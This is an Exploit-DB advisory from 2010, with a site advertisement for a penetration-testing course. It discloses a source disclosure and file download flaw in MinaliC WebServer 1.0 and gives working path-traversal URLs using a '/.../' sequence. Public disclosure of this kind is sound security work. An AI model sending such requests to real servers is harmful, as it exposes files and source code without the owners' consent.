MinaliC WebServer 1.0 - Remote Source Disclosure / File Download

EDB-ID:

15336

CVE:

N/A


Author:

Dr_IDE

Type:

remote


Platform:

Windows

Date:

2010-10-27


Become a Certified Penetration Tester

Enroll in Penetration Testing with Kali Linux and pass the exam to become an Offensive Security Certified Professional (OSCP). All new content for 2020.

###################################################################
#
# MinaliC Webserver 1.0 Remote Source Disclosure/File Download
# Found By: 	Dr_IDE
# Date:     	October 27, 2010
# Download:	    http://sourceforge.net/projects/minalic/
# Tested on:    Windows 7
# Greets:		edb team & John Leitch for finding the app
#
###################################################################
 
- Description -
 
MinialiC Webserver v1.0 is a Windows based HTTP server. This is the latest
version of the application available.
 
MinialiC Webserver v1.0 is vulnerable to common remote source disclosure attacks.
 
- Technical Details - (This is with Directory browsing = Off)
 
http://[ webserver IP][:port][/.../]index.html    (Source Disclosure)
http://[ webserver IP][:port][/.../]logo.bmp      (File Download)

http://localhost:8080/.../index.html
 
#[pocoftheday.blogspot.com]